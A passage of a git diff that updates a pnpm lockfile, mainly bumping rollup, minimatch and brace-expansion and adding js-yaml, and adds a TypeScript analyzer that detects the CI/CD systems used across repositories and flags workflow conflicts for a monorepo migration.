sha512-yTRONe79E+o0FWFijasoTjtzG9EBedFXJMl888NBEDCDV9I2wGbFFfJQQe63OijbFCUZqxpHz1GzpbtSFikJ4Q==} cpu: [loong64] os: [linux] libc: [musl] - '@rollup/rollup-linux-ppc64-gnu@4.57.1': - resolution: {integrity: sha512-4BrCgrpZo4hvzMDKRqEaW1zeecScDCR+2nZ86ATLhAoJ5FQ+lbHVD3ttKe74/c7tNT9c6F2viwB3ufwp01Oh2w==} + '@rollup/rollup-linux-ppc64-gnu@4.59.0': + resolution: {integrity: sha512-sw1o3tfyk12k3OEpRddF68a1unZ5VCN7zoTNtSn2KndUE+ea3m3ROOKRCZxEpmT9nsGnogpFP9x6mnLTCaoLkA==} cpu: [ppc64] os: [linux] libc: [glibc] - '@rollup/rollup-linux-ppc64-musl@4.57.1': - resolution: {integrity: sha512-NOlUuzesGauESAyEYFSe3QTUguL+lvrN1HtwEEsU2rOwdUDeTMJdO5dUYl/2hKf9jWydJrO9OL/XSSf65R5+Xw==} + '@rollup/rollup-linux-ppc64-musl@4.59.0': + resolution: {integrity: sha512-+2kLtQ4xT3AiIxkzFVFXfsmlZiG5FXYW7ZyIIvGA7Bdeuh9Z0aN4hVyXS/G1E9bTP/vqszNIN/pUKCk/BTHsKA==} cpu: [ppc64] os: [linux] libc: [musl] - '@rollup/rollup-linux-riscv64-gnu@4.57.1': - resolution: {integrity: sha512-ptA88htVp0AwUUqhVghwDIKlvJMD/fmL/wrQj99PRHFRAG6Z5nbWoWG4o81Nt9FT+IuqUQi+L31ZKAFeJ5Is+A==} + '@rollup/rollup-linux-riscv64-gnu@4.59.0': + resolution: {integrity: sha512-NDYMpsXYJJaj+I7UdwIuHHNxXZ/b/N2hR15NyH3m2qAtb/hHPA4g4SuuvrdxetTdndfj9b1WOmy73kcPRoERUg==} cpu: [riscv64] os: [linux] libc: [glibc] - '@rollup/rollup-linux-riscv64-musl@4.57.1': - resolution: {integrity: sha512-S51t7aMMTNdmAMPpBg7OOsTdn4tySRQvklmL3RpDRyknk87+Sp3xaumlatU+ppQ+5raY7sSTcC2beGgvhENfuw==} + '@rollup/rollup-linux-riscv64-musl@4.59.0': + resolution: {integrity: sha512-nLckB8WOqHIf1bhymk+oHxvM9D3tyPndZH8i8+35p/1YiVoVswPid2yLzgX7ZJP0KQvnkhM4H6QZ5m0LzbyIAg==} cpu: [riscv64] os: [linux] libc: [musl] - '@rollup/rollup-linux-s390x-gnu@4.57.1': - resolution: {integrity: sha512-Bl00OFnVFkL82FHbEqy3k5CUCKH6OEJL54KCyx2oqsmZnFTR8IoNqBF+mjQVcRCT5sB6yOvK8A37LNm/kPJiZg==} + '@rollup/rollup-linux-s390x-gnu@4.59.0': + resolution: {integrity: sha512-oF87Ie3uAIvORFBpwnCvUzdeYUqi2wY6jRFWJAy1qus/udHFYIkplYRW+wo+GRUP4sKzYdmE1Y3+rY5Gc4ZO+w==} cpu: [s390x] os: [linux] libc: [glibc] - '@rollup/rollup-linux-x64-gnu@4.57.1': - resolution: {integrity: sha512-ABca4ceT4N+Tv/GtotnWAeXZUZuM/9AQyCyKYyKnpk4yoA7QIAuBt6Hkgpw8kActYlew2mvckXkvx0FfoInnLg==} + '@rollup/rollup-linux-x64-gnu@4.59.0': + resolution: {integrity: sha512-3AHmtQq/ppNuUspKAlvA8HtLybkDflkMuLK4DPo77DfthRb71V84/c4MlWJXixZz4uruIH4uaa07IqoAkG64fg==} cpu: [x64] os: [linux] libc: [glibc] - '@rollup/rollup-linux-x64-musl@4.57.1': - resolution: {integrity: sha512-HFps0JeGtuOR2convgRRkHCekD7j+gdAuXM+/i6kGzQtFhlCtQkpwtNzkNj6QhCDp7DRJ7+qC/1Vg2jt5iSOFw==} + '@rollup/rollup-linux-x64-musl@4.59.0': + resolution: {integrity: sha512-2UdiwS/9cTAx7qIUZB/fWtToJwvt0Vbo0zmnYt7ED35KPg13Q0ym1g442THLC7VyI6JfYTP4PiSOWyoMdV2/xg==} cpu: [x64] os: [linux] libc: [musl] - '@rollup/rollup-openbsd-x64@4.57.1': - resolution: {integrity: sha512-H+hXEv9gdVQuDTgnqD+SQffoWoc0Of59AStSzTEj/feWTBAnSfSD3+Dql1ZruJQxmykT/JVY0dE8Ka7z0DH1hw==} + '@rollup/rollup-openbsd-x64@4.59.0': + resolution: {integrity: sha512-M3bLRAVk6GOwFlPTIxVBSYKUaqfLrn8l0psKinkCFxl4lQvOSz8ZrKDz2gxcBwHFpci0B6rttydI4IpS4IS/jQ==} cpu: [x64] os: [openbsd] - '@rollup/rollup-openharmony-arm64@4.57.1': - resolution: {integrity: sha512-4wYoDpNg6o/oPximyc/NG+mYUejZrCU2q+2w6YZqrAs2UcNUChIZXjtafAiiZSUc7On8v5NyNj34Kzj/Ltk6dQ==} + '@rollup/rollup-openharmony-arm64@4.59.0': + resolution: {integrity: sha512-tt9KBJqaqp5i5HUZzoafHZX8b5Q2Fe7UjYERADll83O4fGqJ49O1FsL6LpdzVFQcpwvnyd0i+K/VSwu/o/nWlA==} cpu: [arm64] os: [openharmony] - '@rollup/rollup-win32-arm64-msvc@4.57.1': - resolution: {integrity: sha512-O54mtsV/6LW3P8qdTcamQmuC990HDfR71lo44oZMZlXU4tzLrbvTii87Ni9opq60ds0YzuAlEr/GNwuNluZyMQ==} + '@rollup/rollup-win32-arm64-msvc@4.59.0': + resolution: {integrity: sha512-V5B6mG7OrGTwnxaNUzZTDTjDS7F75PO1ae6MJYdiMu60sq0CqN5CVeVsbhPxalupvTX8gXVSU9gq+Rx1/hvu6A==} cpu: [arm64] os: [win32] - '@rollup/rollup-win32-ia32-msvc@4.57.1': - resolution: {integrity: sha512-P3dLS+IerxCT/7D2q2FYcRdWRl22dNbrbBEtxdWhXrfIMPP9lQhb5h4Du04mdl5Woq05jVCDPCMF7Ub0NAjIew==} + '@rollup/rollup-win32-ia32-msvc@4.59.0': + resolution: {integrity: sha512-UKFMHPuM9R0iBegwzKF4y0C4J9u8C6MEJgFuXTBerMk7EJ92GFVFYBfOZaSGLu6COf7FxpQNqhNS4c4icUPqxA==} cpu: [ia32] os: [win32] - '@rollup/rollup-win32-x64-gnu@4.57.1': - resolution: {integrity: sha512-VMBH2eOOaKGtIJYleXsi2B8CPVADrh+TyNxJ4mWPnKfLB/DBUmzW+5m1xUrcwWoMfSLagIRpjUFeW5CO5hyciQ==} + '@rollup/rollup-win32-x64-gnu@4.59.0': + resolution: {integrity: sha512-laBkYlSS1n2L8fSo1thDNGrCTQMmxjYY5G0WFWjFFYZkKPjsMBsgJfGf4TLxXrF6RyhI60L8TMOjBMvXiTcxeA==} cpu: [x64] os: [win32] - '@rollup/rollup-win32-x64-msvc@4.57.1': - resolution: {integrity: sha512-mxRFDdHIWRxg3UfIIAwCm6NzvxG0jDX/wBN6KsQFTvKFqqg9vTrWUE68qEjHt19A5wwx5X5aUi2zuZT7YR0jrA==} + '@rollup/rollup-win32-x64-msvc@4.59.0': + resolution: {integrity: sha512-2HRCml6OztYXyJXAvdDXPKcawukWY2GpR5/nxKp4iBgiO3wcoEGkAaqctIbZcNB6KlUQBIqt8VYkNSj2397EfA==} cpu: [x64] os: [win32] @@ -715,6 +594,9 @@ packages: '@types/http-errors@2.0.5': resolution: {integrity: sha512-r8Tayk8HJnX0FztbZN7oVqGccWgw98T/0neJphO91KkmOzug1KkofZURD4UaD5uH8AqcFLfdPErnBod0u71/qg==} + '@types/js-yaml@4.0.9': + resolution: {integrity: sha512-k4MGaQl5TGo/iipqb2UDG2UwjXziSWkh0uysQelTlJpX1qGlpUZYm8PnO4DxG1qBomtJUdYJ6qR6xdIah10JLg==} + '@types/jsonfile@6.1.4': resolution: {integrity: sha512-D5qGUYwjvnNNextdU59/+fI+spnwtTFmyQP0h+PfIOSkNfpU6AOICUOkm4i0OnSk+NyjdPJrxCDro0sJsWlRpQ==} @@ -730,6 +612,9 @@ packages: '@types/range-parser@1.2.7': resolution: {integrity: sha512-hKormJbkJqzQGhziax5PItDUTMAM9uE2XXQmM37dyd4hVM+5aVl7oVxMVUiVQn2oCQFN/LKCZdvSM0pFRqbSmQ==} + '@types/semver@7.7.1': + resolution: {integrity: sha512-FmgJfu+MOcQ370SD0ev7EI8TlCAfKYU+B4m5T3yXc1CiRN94g/SZPtsCkk506aUDtlMnFZvasDwHHUcZUEaYuA==} + '@types/send@1.2.1': resolution: {integrity: sha512-arsCikDvlU99zl1g69TcAB3mzZPpxgw0UQnaHeC1Nwb015xp8bknZv5rIfri9xTOcMuaVgvabfIRA7PSZVuZIQ==} @@ -811,6 +696,9 @@ packages: any-promise@1.3.0: resolution: {integrity: sha512-7UvmKalWRt1wgjL1RrGxoSJW/0QZFIegpeGvZG9kjp8vrRu55XTHbwnqq2GpXm9uLbcuhxm3IqX9OB4MZR1b2A==} + argparse@2.0.1: + resolution: {integrity: sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==} + asap@2.0.6: resolution: {integrity: sha512-BSHWgDSAiKs50o2Re8ppvp3seVHXSRM44cdSsT9FfNEUUZLOGWVCsiWaRPWM1Znn+mqZ1OfVZ3z3DWEzSp7hRA==} @@ -821,21 +709,23 @@ packages: asynckit@0.4.0: resolution: {integrity: sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==} - balanced-match@1.0.2: - resolution: {integrity: sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==} + balanced-match@4.0.4: + resolution: {integrity: sha512-BLrgEcRTwX2o6gGxGOCNyMvGSp35YofuYzw9h1IMTRmKqttAZZVU67bdb9Pr2vUHA8+j3i2tJfjO6C6+4myGTA==} + engines: {node: 18 || 20 || >=22} body-parser@2.2.2: resolution: {integrity: sha512-oP5VkATKlNwcgvxi0vM0p/D3n2C3EReYVX+DNYs5TjZFn/oQt2j+4sVJtSMr18pdRr8wjTcBl6LoV+FUwzPmNA==} engines: {node: '>=18'} - brace-expansion@2.0.2: - resolution: {integrity: sha512-Jt0vHyM+jmUBqojB7E1NIYadt0vI0Qxjxd2TErW94wDz+E2LAm5vKMXXwg6ZZBTHPuUlDgQHKXvjGBdfcF1ZDQ==} + brace-expansion@5.0.4: + resolution: {integrity: sha512-h+DEnpVvxmfVefa4jFbCf5HdH5YMDXRsmKflpf1pILZWRFlTbJpxeU55nJl4Smt5HQaGzg1o6RHFPJaOqnmBDg==} + engines: {node: 18 || 20 || >=22} bundle-require@5.1.0: resolution: {integrity: sha512-3WrrOuZiyaaZPWiEt4G3+IffISVC9HYlWueJEBWED4ZH4aIAC2PnkdnuRrR94M+w6yGWn4AglWtJtBI8YqvgoA==} engines: {node: ^12.20.0 || ^14.13.1 || >=16.0.0} peerDependencies: - esbuild: '>=0.18' + esbuild: '>=0.25.0' bytes@3.1.2: resolution: {integrity: sha512-/Nf7TyzTx6S3yRJObOAV7956r8cr2+Oj8AC5dt8wSP3BQAoeX58NoHyCU8P8zGkNXStjTSi6fzO6F0pBdcYbEg==} @@ -991,11 +881,6 @@ packages: resolution: {integrity: sha512-j6vWzfrGVfyXxge+O0x5sh6cvxAog0a/4Rdd2K36zCMV5eJ+/+tOAngRO8cODMNWbVRdVlmGZQL2YS3yR8bIUA==} engines: {node: '>= 0.4'} - esbuild@0.21.5: - resolution: {integrity: sha512-mg3OPMV4hXywwpoDxu3Qda5xCKQi+vCTZq8S9J/EpkhB2HzKXq4SNFZE3+NK93JYxc8VMSep+lOUSC/RVKaBqw==} - engines: {node: '>=12'} - hasBin: true - esbuild@0.27.2: resolution: {integrity: sha512-HyNQImnsOC7X9PMNaCIeAm4ISCQXs5a5YasTXVliKv4uuBo1dKrG0A+uQS8M5eXjVMnLg3WgXaKvprHlFJQffw==} engines: {node: '>=18'} @@ -1157,6 +1042,10 @@ packages: resolution: {integrity: sha512-34wB/Y7MW7bzjKRjUKTa46I2Z7eV62Rkhva+KkopW7Qvv/OSWBqvkSY7vusOPrNuZcUG3tApvdVgNB8POj3SPw==} engines: {node: '>=10'} + js-yaml@4.1.1: + resolution: {integrity: sha512-qQKT4zQxXl8lLwBtHMWwaTcGfFOZviOJet3Oy/xmGk2gZH677CJM9EvtfdSkgWcATZhj/55JZ0rmy3myCT5lsA==} + hasBin: true + jsonfile@6.2.0: resolution: {integrity: sha512-FGuPw30AdOIUTRMC2OMRtQV+jkVj2cfPqSeWXv1NEAJ1qZ5zb1X6z1mFhbfOB/iy3ssJCD+3KuZ8r8C3uVFlAg==} @@ -1224,9 +1113,9 @@ packages: engines: {node: '>=4.0.0'} hasBin: true - minimatch@9.0.5: - resolution: {integrity: sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==} - engines: {node: '>=16 || 14 >=14.17'} + minimatch@10.2.4: + resolution: {integrity: sha512-oRjTw/97aTBN0RHbYCdtF1MQfvusSIBQM0IZEgzl6426+8jSC0nF1a/GmnVLpfB9yyr6g6FTqWqiZVbxrtaCIg==} + engines: {node: 18 || 20 || >=22} minipass@7.1.2: resolution: {integrity: sha512-qOOzS1cBTWYF4BH8fVePDBOO9iptMnGUEZwNc/cMWnTV2nVLZ7VoNWEPHkYczZA0pdoA7dl6e7FL659nX9S2aw==} @@ -1357,8 +1246,8 @@ packages: resolution: {integrity: sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==} engines: {node: '>=8'} - rollup@4.57.1: - resolution: {integrity: sha512-oQL6lgK3e2QZeQ7gcgIkS2YZPg5slw37hYufJ3edKlfQSGGm8ICoxswK15ntSzF/a8+h7ekRy7k7oWc3BQ7y8A==} + rollup@4.59.0: + resolution: {integrity: sha512-2oMpl67a3zCH9H79LeMcbDhXW/UmWG/y2zuqnF2jQq5uq9TbM9TVyXvA4+t+ne2IIkBdrLpAaRQAvo7YI/Yyeg==} engines: {node: '>=18.0.0', npm: '>=8.0.0'} hasBin: true @@ -1684,150 +1573,81 @@ snapshots: '@bcoe/v8-coverage@0.2.3': {} - '@esbuild/aix-ppc64@0.21.5': - optional: true - '@esbuild/aix-ppc64@0.27.2': optional: true - '@esbuild/android-arm64@0.21.5': - optional: true - '@esbuild/android-arm64@0.27.2': optional: true - '@esbuild/android-arm@0.21.5': - optional: true - '@esbuild/android-arm@0.27.2': optional: true - '@esbuild/android-x64@0.21.5': - optional: true - '@esbuild/android-x64@0.27.2': optional: true - '@esbuild/darwin-arm64@0.21.5': - optional: true - '@esbuild/darwin-arm64@0.27.2': optional: true - '@esbuild/darwin-x64@0.21.5': - optional: true - '@esbuild/darwin-x64@0.27.2': optional: true - '@esbuild/freebsd-arm64@0.21.5': - optional: true - '@esbuild/freebsd-arm64@0.27.2': optional: true - '@esbuild/freebsd-x64@0.21.5': - optional: true - '@esbuild/freebsd-x64@0.27.2': optional: true - '@esbuild/linux-arm64@0.21.5': - optional: true - '@esbuild/linux-arm64@0.27.2': optional: true - '@esbuild/linux-arm@0.21.5': - optional: true - '@esbuild/linux-arm@0.27.2': optional: true - '@esbuild/linux-ia32@0.21.5': - optional: true - '@esbuild/linux-ia32@0.27.2': optional: true - '@esbuild/linux-loong64@0.21.5': - optional: true - '@esbuild/linux-loong64@0.27.2': optional: true - '@esbuild/linux-mips64el@0.21.5': - optional: true - '@esbuild/linux-mips64el@0.27.2': optional: true - '@esbuild/linux-ppc64@0.21.5': - optional: true - '@esbuild/linux-ppc64@0.27.2': optional: true - '@esbuild/linux-riscv64@0.21.5': - optional: true - '@esbuild/linux-riscv64@0.27.2': optional: true - '@esbuild/linux-s390x@0.21.5': - optional: true - '@esbuild/linux-s390x@0.27.2': optional: true - '@esbuild/linux-x64@0.21.5': - optional: true - '@esbuild/linux-x64@0.27.2': optional: true '@esbuild/netbsd-arm64@0.27.2': optional: true - '@esbuild/netbsd-x64@0.21.5': - optional: true - '@esbuild/netbsd-x64@0.27.2': optional: true '@esbuild/openbsd-arm64@0.27.2': optional: true - '@esbuild/openbsd-x64@0.21.5': - optional: true - '@esbuild/openbsd-x64@0.27.2': optional: true '@esbuild/openharmony-arm64@0.27.2': optional: true - '@esbuild/sunos-x64@0.21.5': - optional: true - '@esbuild/sunos-x64@0.27.2': optional: true - '@esbuild/win32-arm64@0.21.5': - optional: true - '@esbuild/win32-arm64@0.27.2': optional: true - '@esbuild/win32-ia32@0.21.5': - optional: true - '@esbuild/win32-ia32@0.27.2': optional: true - '@esbuild/win32-x64@0.21.5': - optional: true - '@esbuild/win32-x64@0.27.2': optional: true @@ -1998,79 +1818,79 @@ snapshots: '@pkgjs/parseargs@0.11.0': optional: true - '@rollup/rollup-android-arm-eabi@4.57.1': + '@rollup/rollup-android-arm-eabi@4.59.0': optional: true - '@rollup/rollup-android-arm64@4.57.1': + '@rollup/rollup-android-arm64@4.59.0': optional: true - '@rollup/rollup-darwin-arm64@4.57.1': + '@rollup/rollup-darwin-arm64@4.59.0': optional: true - '@rollup/rollup-darwin-x64@4.57.1': + '@rollup/rollup-darwin-x64@4.59.0': optional: true - '@rollup/rollup-freebsd-arm64@4.57.1': + '@rollup/rollup-freebsd-arm64@4.59.0': optional: true - '@rollup/rollup-freebsd-x64@4.57.1': + '@rollup/rollup-freebsd-x64@4.59.0': optional: true - '@rollup/rollup-linux-arm-gnueabihf@4.57.1': + '@rollup/rollup-linux-arm-gnueabihf@4.59.0': optional: true - '@rollup/rollup-linux-arm-musleabihf@4.57.1': + '@rollup/rollup-linux-arm-musleabihf@4.59.0': optional: true - '@rollup/rollup-linux-arm64-gnu@4.57.1': + '@rollup/rollup-linux-arm64-gnu@4.59.0': optional: true - '@rollup/rollup-linux-arm64-musl@4.57.1': + '@rollup/rollup-linux-arm64-musl@4.59.0': optional: true - '@rollup/rollup-linux-loong64-gnu@4.57.1': + '@rollup/rollup-linux-loong64-gnu@4.59.0': optional: true - '@rollup/rollup-linux-loong64-musl@4.57.1': + '@rollup/rollup-linux-loong64-musl@4.59.0': optional: true - '@rollup/rollup-linux-ppc64-gnu@4.57.1': + '@rollup/rollup-linux-ppc64-gnu@4.59.0': optional: true - '@rollup/rollup-linux-ppc64-musl@4.57.1': + '@rollup/rollup-linux-ppc64-musl@4.59.0': optional: true - '@rollup/rollup-linux-riscv64-gnu@4.57.1': + '@rollup/rollup-linux-riscv64-gnu@4.59.0': optional: true - '@rollup/rollup-linux-riscv64-musl@4.57.1': + '@rollup/rollup-linux-riscv64-musl@4.59.0': optional: true - '@rollup/rollup-linux-s390x-gnu@4.57.1': + '@rollup/rollup-linux-s390x-gnu@4.59.0': optional: true - '@rollup/rollup-linux-x64-gnu@4.57.1': + '@rollup/rollup-linux-x64-gnu@4.59.0': optional: true - '@rollup/rollup-linux-x64-musl@4.57.1': + '@rollup/rollup-linux-x64-musl@4.59.0': optional: true - '@rollup/rollup-openbsd-x64@4.57.1': + '@rollup/rollup-openbsd-x64@4.59.0': optional: true - '@rollup/rollup-openharmony-arm64@4.57.1': + '@rollup/rollup-openharmony-arm64@4.59.0': optional: true - '@rollup/rollup-win32-arm64-msvc@4.57.1': + '@rollup/rollup-win32-arm64-msvc@4.59.0': optional: true - '@rollup/rollup-win32-ia32-msvc@4.57.1': + '@rollup/rollup-win32-ia32-msvc@4.59.0': optional: true - '@rollup/rollup-win32-x64-gnu@4.57.1': + '@rollup/rollup-win32-x64-gnu@4.59.0': optional: true - '@rollup/rollup-win32-x64-msvc@4.57.1': + '@rollup/rollup-win32-x64-msvc@4.59.0': optional: true '@types/body-parser@1.19.6': @@ -2106,6 +1926,8 @@ snapshots: '@types/http-errors@2.0.5': {} + '@types/js-yaml@4.0.9': {} + '@types/jsonfile@6.1.4': dependencies: '@types/node': 20.19.31 @@ -2120,6 +1942,8 @@ snapshots: '@types/range-parser@1.2.7': {} + '@types/semver@7.7.1': {} + '@types/send@1.2.1': dependencies: '@types/node': 20.19.31 @@ -2222,13 +2046,15 @@ snapshots: any-promise@1.3.0: {} + argparse@2.0.1: {} + asap@2.0.6: {} assertion-error@2.0.1: {} asynckit@0.4.0: {} - balanced-match@1.0.2: {} + balanced-match@4.0.4: {} body-parser@2.2.2: dependencies: @@ -2244,9 +2070,9 @@ snapshots: transitivePeerDependencies: - supports-color - brace-expansion@2.0.2: + brace-expansion@5.0.4: dependencies: - balanced-match: 1.0.2 + balanced-match: 4.0.4 bundle-require@5.1.0(esbuild@0.27.2): dependencies: @@ -2371,32 +2197,6 @@ snapshots: has-tostringtag: 1.0.2 hasown: 2.0.2 - esbuild@0.21.5: - optionalDependencies: - '@esbuild/aix-ppc64': 0.21.5 - '@esbuild/android-arm': 0.21.5 - '@esbuild/android-arm64': 0.21.5 - '@esbuild/android-x64': 0.21.5 - '@esbuild/darwin-arm64': 0.21.5 - '@esbuild/darwin-x64': 0.21.5 - '@esbuild/freebsd-arm64': 0.21.5 - '@esbuild/freebsd-x64': 0.21.5 - '@esbuild/linux-arm': 0.21.5 - '@esbuild/linux-arm64': 0.21.5 - '@esbuild/linux-ia32': 0.21.5 - '@esbuild/linux-loong64': 0.21.5 - '@esbuild/linux-mips64el': 0.21.5 - '@esbuild/linux-ppc64': 0.21.5 - '@esbuild/linux-riscv64': 0.21.5 - '@esbuild/linux-s390x': 0.21.5 - '@esbuild/linux-x64': 0.21.5 - '@esbuild/netbsd-x64': 0.21.5 - '@esbuild/openbsd-x64': 0.21.5 - '@esbuild/sunos-x64': 0.21.5 - '@esbuild/win32-arm64': 0.21.5 - '@esbuild/win32-ia32': 0.21.5 - '@esbuild/win32-x64': 0.21.5 - esbuild@0.27.2: optionalDependencies: '@esbuild/aix-ppc64': 0.27.2 @@ -2490,7 +2290,7 @@ snapshots: dependencies: magic-string: 0.30.21 mlly: 1.8.0 - rollup: 4.57.1 + rollup: 4.59.0 foreground-child@3.3.1: dependencies: @@ -2548,7 +2348,7 @@ snapshots: dependencies: foreground-child: 3.3.1 jackspeak: 3.4.3 - minimatch: 9.0.5 + minimatch: 10.2.4 minipass: 7.1.2 package-json-from-dist: 1.0.1 path-scurry: 1.11.1 @@ -2622,6 +2422,10 @@ snapshots: joycon@3.1.1: {} + js-yaml@4.1.1: + dependencies: + argparse: 2.0.1 + jsonfile@6.2.0: dependencies: universalify: 2.0.1 @@ -2674,9 +2478,9 @@ snapshots: mime@2.6.0: {} - minimatch@9.0.5: + minimatch@10.2.4: dependencies: - brace-expansion: 2.0.2 + brace-expansion: 5.0.4 minipass@7.1.2: {} @@ -2778,35 +2582,35 @@ snapshots: resolve-from@5.0.0: {} - rollup@4.57.1: + rollup@4.59.0: dependencies: '@types/estree': 1.0.8 optionalDependencies: - '@rollup/rollup-android-arm-eabi': 4.57.1 - '@rollup/rollup-android-arm64': 4.57.1 - '@rollup/rollup-darwin-arm64': 4.57.1 - '@rollup/rollup-darwin-x64': 4.57.1 - '@rollup/rollup-freebsd-arm64': 4.57.1 - '@rollup/rollup-freebsd-x64': 4.57.1 - '@rollup/rollup-linux-arm-gnueabihf': 4.57.1 - '@rollup/rollup-linux-arm-musleabihf': 4.57.1 - '@rollup/rollup-linux-arm64-gnu': 4.57.1 - '@rollup/rollup-linux-arm64-musl': 4.57.1 - '@rollup/rollup-linux-loong64-gnu': 4.57.1 - '@rollup/rollup-linux-loong64-musl': 4.57.1 - '@rollup/rollup-linux-ppc64-gnu': 4.57.1 - '@rollup/rollup-linux-ppc64-musl': 4.57.1 - '@rollup/rollup-linux-riscv64-gnu': 4.57.1 - '@rollup/rollup-linux-riscv64-musl': 4.57.1 - '@rollup/rollup-linux-s390x-gnu': 4.57.1 - '@rollup/rollup-linux-x64-gnu': 4.57.1 - '@rollup/rollup-linux-x64-musl': 4.57.1 - '@rollup/rollup-openbsd-x64': 4.57.1 - '@rollup/rollup-openharmony-arm64': 4.57.1 - '@rollup/rollup-win32-arm64-msvc': 4.57.1 - '@rollup/rollup-win32-ia32-msvc': 4.57.1 - '@rollup/rollup-win32-x64-gnu': 4.57.1 - '@rollup/rollup-win32-x64-msvc': 4.57.1 + '@rollup/rollup-android-arm-eabi': 4.59.0 + '@rollup/rollup-android-arm64': 4.59.0 + '@rollup/rollup-darwin-arm64': 4.59.0 + '@rollup/rollup-darwin-x64': 4.59.0 + '@rollup/rollup-freebsd-arm64': 4.59.0 + '@rollup/rollup-freebsd-x64': 4.59.0 + '@rollup/rollup-linux-arm-gnueabihf': 4.59.0 + '@rollup/rollup-linux-arm-musleabihf': 4.59.0 + '@rollup/rollup-linux-arm64-gnu': 4.59.0 + '@rollup/rollup-linux-arm64-musl': 4.59.0 + '@rollup/rollup-linux-loong64-gnu': 4.59.0 + '@rollup/rollup-linux-loong64-musl': 4.59.0 + '@rollup/rollup-linux-ppc64-gnu': 4.59.0 + '@rollup/rollup-linux-ppc64-musl': 4.59.0 + '@rollup/rollup-linux-riscv64-gnu': 4.59.0 + '@rollup/rollup-linux-riscv64-musl': 4.59.0 + '@rollup/rollup-linux-s390x-gnu': 4.59.0 + '@rollup/rollup-linux-x64-gnu': 4.59.0 + '@rollup/rollup-linux-x64-musl': 4.59.0 + '@rollup/rollup-openbsd-x64': 4.59.0 + '@rollup/rollup-openharmony-arm64': 4.59.0 + '@rollup/rollup-win32-arm64-msvc': 4.59.0 + '@rollup/rollup-win32-ia32-msvc': 4.59.0 + '@rollup/rollup-win32-x64-gnu': 4.59.0 + '@rollup/rollup-win32-x64-msvc': 4.59.0 fsevents: 2.3.3 router@2.2.0: @@ -2966,7 +2770,7 @@ snapshots: dependencies: '@istanbuljs/schema': 0.1.3 glob: 10.5.0 - minimatch: 9.0.5 + minimatch: 10.2.4 thenify-all@1.6.0: dependencies: @@ -3010,7 +2814,7 @@ snapshots: picocolors: 1.1.1 postcss-load-config: 6.0.1(postcss@8.5.6) resolve-from: 5.0.0 - rollup: 4.57.1 + rollup: 4.59.0 source-map: 0.7.6 sucrase: 3.35.1 tinyexec: 0.3.2 @@ -3063,9 +2867,9 @@ snapshots: vite@5.4.21(@types/node@20.19.31): dependencies: - esbuild: 0.21.5 + esbuild: 0.27.2 postcss: 8.5.6 - rollup: 4.57.1 + rollup: 4.59.0 optionalDependencies: '@types/node': 20.19.31 fsevents: 2.3.3 diff --git a/src/analyzers/ci.ts b/src/analyzers/ci.ts new file mode 100755 index 0000000..d31982f --- /dev/null +++ b/src/analyzers/ci.ts @@ -0,0 +1,113 @@ +import path from 'node:path'; +import type { AnalysisFinding, Logger } from '../types/index.js'; +import { pathExists, listFiles } from '../utils/fs.js'; + +const CI_SYSTEMS: Array<{ + name: string; + indicators: string[]; +}> = [ + { name: 'GitHub Actions', indicators: ['.github/workflows'] }, + { name: 'CircleCI', indicators: ['.circleci/config.yml', '.circleci/config.yaml'] }, + { name: 'Travis CI', indicators: ['.travis.yml'] }, + { name: 'GitLab CI', indicators: ['.gitlab-ci.yml'] }, + { name: 'Jenkins', indicators: ['Jenkinsfile'] }, + { name: 'Azure Pipelines', indicators: ['azure-pipelines.yml'] }, +]; + +/** + * Analyze CI/CD systems across repositories. + * Detects CI platforms and flags conflicts. + */ +export async function analyzeCI( + repoPaths: Array<{ path: string; name: string }>, + logger: Logger, +): Promise { + const findings: AnalysisFinding[] = []; + const ciDetections: Array<{ repo: string; system: string; files: string[] }> = []; + + for (const repo of repoPaths) { + for (const ci of CI_SYSTEMS) { + for (const indicator of ci.indicators) { + const fullPath = path.join(repo.path, indicator); + if (await pathExists(fullPath)) { + // For directories like .github/workflows, list files + let files = [indicator]; + try { + const dirFiles = await listFiles(fullPath); + files = dirFiles.map((f) => path.join(indicator, f)); + } catch { + // Not a directory, use as-is + } + ciDetections.push({ repo: repo.name, system: ci.name, files }); + } + } + } + } + + // Report detected CI systems + const systemCounts = new Map(); + for (const d of ciDetections) { + if (!systemCounts.has(d.system)) systemCounts.set(d.system, []); + systemCounts.get(d.system)!.push(d.repo); + } + + if (systemCounts.size > 1) { + findings.push({ + id: 'ci-multiple-systems', + title: 'Multiple CI/CD systems detected', + severity: 'warn', + confidence: 'high', + evidence: [...systemCounts.entries()].map(([system, repos]) => ({ + path: repos.join(', '), + snippet: `${system}: ${repos.length} repos`, + })), + suggestedAction: 'Standardize on a single CI system for the monorepo. GitHub Actions is recommended for GitHub-hosted repos.', + }); + } + + // Check for workflow name conflicts (GitHub Actions specific) + const ghWorkflows = ciDetections.filter((d) => d.system === 'GitHub Actions'); + if (ghWorkflows.length > 1) { + const workflowNames = new Map(); + for (const wf of ghWorkflows) { + for (const file of wf.files) { + const name = path.basename(file); + if (!workflowNames.has(name)) workflowNames.set(name, []); + workflowNames.get(name)!.push(wf.repo); + } + } + + for (const [name, repos] of workflowNames) { + if (repos.length > 1) { + findings.push({ + id: `ci-workflow-conflict-${name}`, + title: `GitHub Actions workflow '${name}' exists in multiple repos`, + severity: 'warn', + confidence: 'high', + evidence: repos.map((r) => ({ + path: r, + snippet: `.github/workflows/${name}`, + })), + suggestedAction: 'Workflows will need to be merged or renamed during migration', + }); + } + } + } + + // Check for repos with no CI + const reposWithCI = new Set(ciDetections.map((d) => d.repo)); + const reposWithoutCI = repoPaths.filter((r) => !reposWithCI.has(r.name)); + if (reposWithoutCI.length > 0 && reposWithCI.size > 0) { + findings.push({ + id: 'ci-missing', + title: 'Some repositories have no CI configuration', + severity: 'info', + confidence: 'high', + evidence: reposWithoutCI.map((r) => ({ path: r.name })), + suggestedAction: 'Consider adding CI for these packages in the 